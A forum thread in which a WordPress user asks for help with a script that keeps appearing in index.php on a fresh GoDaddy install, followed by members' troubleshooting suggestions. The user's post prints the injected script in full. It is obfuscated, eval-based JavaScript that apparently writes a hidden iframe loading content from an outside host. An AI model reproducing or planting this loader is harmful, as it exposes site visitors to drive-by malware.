[dreamincodehamza]

i am installing and wordpress blog on my godaddy hosting account and it is getting hacking code.
its a fresh installation and i tried again installing it but it is getting hacking code on top index.php
please help .

[modi123_1]

What do you mean "hacking code"?

[dreamincodehamza]

modi123_1, on 21 February 2012 - 03:30 PM, said:

What do you mean "hacking code"?

This is what i am getting.

<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,27,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,27,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f+'C'+'ode'](-h*(1+n[j]));}q=ss;e(q);</script>

[revolutionx]

Which version of Wordpress are you using?

Have you scanned your PC to check that it hasn't been compromised? Have you changed your FTP login.

Which (if any) plugins are you using?

This post has been edited by revolutionx: 22 February 2012 - 06:36 AM

[dreamincodehamza]

revolutionx, on 22 February 2012 - 06:35 AM, said:

Which version of Wordpress are you using?

Have you scanned your PC to check that it hasn't been compromised? Have you changed your FTP login.

Which (if any) plugins are you using?

wordpress version 3.2.1 and now i upgrade as well but still getting the same code.
Yeah scanned my pc using nortan antivirous

[floppyspace]

This seems to be a new issue (or old one) arising.

See if any of these suggestions help

wordpress malware attack

good luck

If one of the js buffs come across this can you tell us what the script is actually doing, and a possible code to cancel its actions?

This post has been edited by floppyspace: 22 February 2012 - 08:07 PM

[no2pencil]

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.

[floppyspace]

no2pencil, on 22 February 2012 - 08:07 PM, said:

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.

It would take them a while but yes this is a good option, I recently had dealings with them and to post the e-mails would delight me but it would probably come back and bite me in the a**.

I just checked 2 Godaddy sites I help maintain and they are not compromised.

Godaddy gives you an empty box to play with (so to speak) you can do anything with the space they provide, Just go into the manager kill the database and reinstall WordPress (it is quicker than seeking assistance from the support staff).

I find it easier using filezilla to upload but each to there own (at least I know it is the copy of WordPress I obtained ).

[Reprobus]

floppyspace, on 22 February 2012 - 10:21 PM, said:

no2pencil, on 22 February 2012 - 08:07 PM, said:

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.

It would take them a while but yes this is a good option, I recently had dealings with them and to post the e-mails would delight me but it would probably come back and bite me in the a**.

I just checked 2 Godaddy sites I help maintain and they are not compromised.

Godaddy gives you an empty box to play with (so to speak) you can do anything with the space they provide, Just go into the manager kill the database and reinstall WordPress (it is quicker than seeking assistance from the support staff).

I find it easier using filezilla to upload but each to there own (at least I know it is the copy of WordPress I obtained ).

I recently began having SPAM messages, asking me to approve of them passing though my SPAM blockers in WordPress 3.3 and make there way to my inbox. I can't figure out, how this is happening ?